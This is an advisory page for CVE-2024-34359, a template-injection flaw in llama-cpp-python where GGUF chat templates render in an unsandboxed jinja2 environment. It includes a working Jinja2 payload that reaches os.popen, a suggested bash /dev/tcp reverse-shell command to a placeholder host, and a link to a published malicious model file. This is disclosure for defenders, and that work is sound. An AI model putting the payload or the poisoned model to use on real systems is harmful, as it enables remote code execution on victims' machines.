Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01NnhnLXdmY2MtZzgyOc4AA74j
llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata
Description
llama-cpp-python
depends on class Llama
in llama.py
to load .gguf
llama.cpp or Latency Machine Learning Models. The __init__
constructor built in the Llama
takes several parameters to configure the loading and running of the model. Other than NUMA, LoRa settings
, loading tokenizers,
and hardware settings
, __init__
also loads the chat template
from targeted .gguf
's Metadata and furtherly parses it to llama_chat_format.Jinja2ChatFormatter.to_chat_handler()
to construct the self.chat_handler
for this model. Nevertheless, Jinja2ChatFormatter
parse the chat template
within the Metadate with sandbox-less jinja2.Environment
, which is furthermore rendered in __call__
to construct the prompt
of interaction. This allows jinja2
Server Side Template Injection which leads to RCE by a carefully constructed payload.
Source-to-Sink
llama.py
-> class Llama
-> __init__
:
class Llama:
"""High-level Python wrapper for a llama.cpp model."""
__backend_initialized = False
def __init__(
self,
model_path: str,
# lots of params; Ignoring
):
self.verbose = verbose
set_verbose(verbose)
if not Llama.__backend_initialized:
with suppress_stdout_stderr(disable=verbose):
llama_cpp.llama_backend_init()
Llama.__backend_initialized = True
# Ignoring lines of unrelated codes.....
try:
self.metadata = self._model.metadata()
except Exception as e:
self.metadata = {}
if self.verbose:
print(f"Failed to load metadata: {e}", file=sys.stderr)
if self.verbose:
print(f"Model metadata: {self.metadata}", file=sys.stderr)
if (
self.chat_format is None
and self.chat_handler is None
and "tokenizer.chat_template" in self.metadata
):
chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(
self.metadata
)
if chat_format is not None:
self.chat_format = chat_format
if self.verbose:
print(f"Guessed chat format: {chat_format}", file=sys.stderr)
else:
template = self.metadata["tokenizer.chat_template"]
try:
eos_token_id = int(self.metadata["tokenizer.ggml.eos_token_id"])
except:
eos_token_id = self.token_eos()
try:
bos_token_id = int(self.metadata["tokenizer.ggml.bos_token_id"])
except:
bos_token_id = self.token_bos()
eos_token = self._model.token_get_text(eos_token_id)
bos_token = self._model.token_get_text(bos_token_id)
if self.verbose:
print(f"Using gguf chat template: {template}", file=sys.stderr)
print(f"Using chat eos_token: {eos_token}", file=sys.stderr)
print(f"Using chat bos_token: {bos_token}", file=sys.stderr)
self.chat_handler = llama_chat_format.Jinja2ChatFormatter(
template=template,
eos_token=eos_token,
bos_token=bos_token,
stop_token_ids=[eos_token_id],
).to_chat_handler()
if self.chat_format is None and self.chat_handler is None:
self.chat_format = "llama-2"
if self.verbose:
print(f"Using fallback chat format: {chat_format}", file=sys.stderr)
In llama.py
, llama-cpp-python
defined the fundamental class for model initialization parsing (Including NUMA, LoRa settings
, loading tokenizers,
and stuff ). In our case, we will be focusing on the parts where it processes metadata
; it first checks if chat_format
and chat_handler
are None
and checks if the key tokenizer.chat_template
exists in the metadata dictionary self.metadata
. If it exists, it will try to guess the chat format
from the metadata
. If the guess fails, it will get the value of chat_template
directly from self.metadata.self.metadata
is set during class initialization and it tries to get the metadata by calling the model's metadata() method, after that, the chat_template
is parsed into llama_chat_format.Jinja2ChatFormatter
as params which furthermore stored the to_chat_handler()
as chat_handler
llama_chat_format.py
-> Jinja2ChatFormatter
:
self._environment = jinja2.Environment( -> from_string(self.template) -> self._environment.render(
class ChatFormatter(Protocol):
"""Base Protocol for a chat formatter. A chat formatter is a function that
takes a list of messages and returns a chat format response which can be used
to generate a completion. The response can also include a stop token or list
of stop tokens to use for the completion."""
def __call__(
self,
*,
messages: List[llama_types.ChatCompletionRequestMessage],
**kwargs: Any,
) -> ChatFormatterResponse: ...
class Jinja2ChatFormatter(ChatFormatter):
def __init__(
self,
template: str,
eos_token: str,
bos_token: str,
add_generation_prompt: bool = True,
stop_token_ids: Optional[List[int]] = None,
):
"""A chat formatter that uses jinja2 templates to format the prompt."""
self.template = template
self.eos_token = eos_token
self.bos_token = bos_token
self.add_generation_prompt = add_generation_prompt
self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None
self._environment = jinja2.Environment(
loader=jinja2.BaseLoader(),
trim_blocks=True,
lstrip_blocks=True,
).from_string(self.template)
def __call__(
self,
*,
messages: List[llama_types.ChatCompletionRequestMessage],
functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
tools: Optional[List[llama_types.ChatCompletionTool]] = None,
tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
**kwargs: Any,
) -> ChatFormatterResponse:
def raise_exception(message: str):
raise ValueError(message)
prompt = self._environment.render(
messages=messages,
eos_token=self.eos_token,
bos_token=self.bos_token,
raise_exception=raise_exception,
add_generation_prompt=self.add_generation_prompt,
functions=functions,
function_call=function_call,
tools=tools,
tool_choice=tool_choice,
)
As we can see in llama_chat_format.py
-> Jinja2ChatFormatter
, the constructor __init__
initialized required members
inside of the class; Nevertheless, focusing on this line:
self._environment = jinja2.Environment(
loader=jinja2.BaseLoader(),
trim_blocks=True,
lstrip_blocks=True,
).from_string(self.template)
Fun thing here: llama_cpp_python
directly loads the self.template
(self.template = template
which is the chat template
located in the Metadate
that is parsed as a param) via jinja2.Environment.from_string(
without setting any sandbox flag or using the protected immutablesandboxedenvironment
class. This is extremely unsafe since the attacker can implicitly tell llama_cpp_python
to load malicious chat template
which is furthermore rendered in the __call__
constructor, allowing RCEs or Denial-of-Service since jinja2
's renderer evaluates embed codes like eval()
, and we can utilize expose method by exploring the attribution such as __globals__
, __subclasses__
of pretty much anything.
def __call__(
self,
*,
messages: List[llama_types.ChatCompletionRequestMessage],
functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
tools: Optional[List[llama_types.ChatCompletionTool]] = None,
tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
**kwargs: Any,
) -> ChatFormatterResponse:
def raise_exception(message: str):
raise ValueError(message)
prompt = self._environment.render( # rendered!
messages=messages,
eos_token=self.eos_token,
bos_token=self.bos_token,
raise_exception=raise_exception,
add_generation_prompt=self.add_generation_prompt,
functions=functions,
function_call=function_call,
tools=tools,
tool_choice=tool_choice,
)
Exploiting
For our exploitation, we first downloaded qwen1_5-0_5b-chat-q2_k.gguf of Qwen/Qwen1.5-0.5B-Chat-GGUF
on huggingface
as the base of the exploitation, by importing the file to Hex-compatible
editors (In my case I used the built-in Hex editor
or vscode
), you can try to search for key chat_template
(imported as template = self.metadata["tokenizer.chat_template"]
in llama-cpp-python
):
qwen1_5-0_5b-chat-q2_k.gguf
appears to be using the OG role+message
and using the fun jinja2
syntax. By first replacing the original chat_template
in \x00
, then inserting our SSTI payload. We constructed this payload which firstly iterates over the subclasses of the base class of all classes in Python. The expression ().__class__.__base__.__subclasses__()
retrieves a list of all subclasses of the basic object
class and then we check if its warning
by if "warning" in x.__name__
, if it is , we access its module via the _module
attribute then access Python's built-in functions through __builtins__
and uses the __import__
function to import the os
module and finally we called os.popen
to touch /tmp/retr0reg
, create an empty file call retr0reg
under /tmp/
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("touch /tmp/retr0reg")}}{%endif%}{% endfor %}
in real life exploiting instance, we can change touch /tmp/retr0reg
into arbitrary codes like sh -i >& /dev/tcp/<HOST>/<PORT> 0>&1
to create a reverse shell connection to specified host, in our case we are using touch /tmp/retr0reg
to showcase the exploitability of this vulnerability.
After these steps, we got ourselves a malicious model with an embedded payload in chat_template
of the metahead
, in which will be parsed and rendered by llama.py:class Llama:init -> self.chat_handler
-> llama_chat_format.py:Jinja2ChatFormatter:init -> self._environment = jinja2.Environment(
-> ``llama_chat_format.py:Jinja2ChatFormatter:call -> self._environment.render(`
(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )
from llama_cpp import Llama
# Loading locally:
model = Llama(model_path="qwen1_5-0_5b-chat-q2_k.gguf")
# Or loading from huggingface:
model = Llama.from_pretrained(
repo_id="Retr0REG/Whats-up-gguf",
filename="qwen1_5-0_5b-chat-q2_k.gguf",
verbose=False
)
print(model.create_chat_completion(messages=[{"role": "user","content": "what is the meaning of life?"}]))
Now when the model is loaded whether as Llama.from_pretrained
or Llama
and chatted, our malicious code in the chat_template
of the metahead
will be triggered and execute arbitrary code.
PoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing
Permalink: https://github.com/advisories/GHSA-56xg-wfcc-g829JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NnhnLXdmY2MtZzgyOc4AA74j
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 7 months ago
Updated: 6 months ago
CVSS Score: 9.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Identifiers: GHSA-56xg-wfcc-g829, CVE-2024-34359
References:
- https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
- https://nvd.nist.gov/vuln/detail/CVE-2024-34359
- https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
- https://github.com/advisories/GHSA-56xg-wfcc-g829
Blast Radius: 31.3
Affected Packages
pypi:llama-cpp-python
Dependent packages: 136Dependent repositories: 1,685
Downloads: 227,418 last month
Affected Version Ranges: >= 0.2.30, <= 0.2.71
Fixed in: 0.2.72
All affected versions: 0.2.30, 0.2.31, 0.2.32, 0.2.33, 0.2.34, 0.2.35, 0.2.36, 0.2.37, 0.2.38, 0.2.39, 0.2.40, 0.2.41, 0.2.42, 0.2.43, 0.2.44, 0.2.45, 0.2.46, 0.2.47, 0.2.48, 0.2.49, 0.2.50, 0.2.51, 0.2.52, 0.2.53, 0.2.54, 0.2.55, 0.2.56, 0.2.57, 0.2.58, 0.2.59, 0.2.60, 0.2.61, 0.2.62, 0.2.63, 0.2.64, 0.2.65, 0.2.66, 0.2.67, 0.2.68, 0.2.69, 0.2.70, 0.2.71
All unaffected versions: 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.1.10, 0.1.11, 0.1.12, 0.1.13, 0.1.14, 0.1.15, 0.1.16, 0.1.17, 0.1.18, 0.1.19, 0.1.20, 0.1.21, 0.1.22, 0.1.23, 0.1.24, 0.1.25, 0.1.26, 0.1.27, 0.1.28, 0.1.29, 0.1.30, 0.1.31, 0.1.32, 0.1.33, 0.1.34, 0.1.35, 0.1.36, 0.1.37, 0.1.38, 0.1.39, 0.1.40, 0.1.41, 0.1.42, 0.1.43, 0.1.44, 0.1.45, 0.1.46, 0.1.47, 0.1.48, 0.1.49, 0.1.50, 0.1.51, 0.1.52, 0.1.53, 0.1.54, 0.1.55, 0.1.56, 0.1.57, 0.1.59, 0.1.61, 0.1.62, 0.1.63, 0.1.64, 0.1.65, 0.1.66, 0.1.67, 0.1.68, 0.1.69, 0.1.70, 0.1.71, 0.1.72, 0.1.73, 0.1.74, 0.1.76, 0.1.77, 0.1.78, 0.1.79, 0.1.80, 0.1.81, 0.1.82, 0.1.83, 0.1.84, 0.1.85, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.2.9, 0.2.10, 0.2.11, 0.2.12, 0.2.13, 0.2.14, 0.2.15, 0.2.16, 0.2.17, 0.2.18, 0.2.19, 0.2.20, 0.2.22, 0.2.23, 0.2.24, 0.2.25, 0.2.26, 0.2.27, 0.2.28, 0.2.29, 0.2.72, 0.2.73, 0.2.74, 0.2.75, 0.2.76, 0.2.77, 0.2.78, 0.2.79, 0.2.80, 0.2.81, 0.2.82, 0.2.83, 0.2.84, 0.2.85, 0.2.86, 0.2.87, 0.2.88, 0.2.89, 0.2.90, 0.3.0, 0.3.1, 0.3.2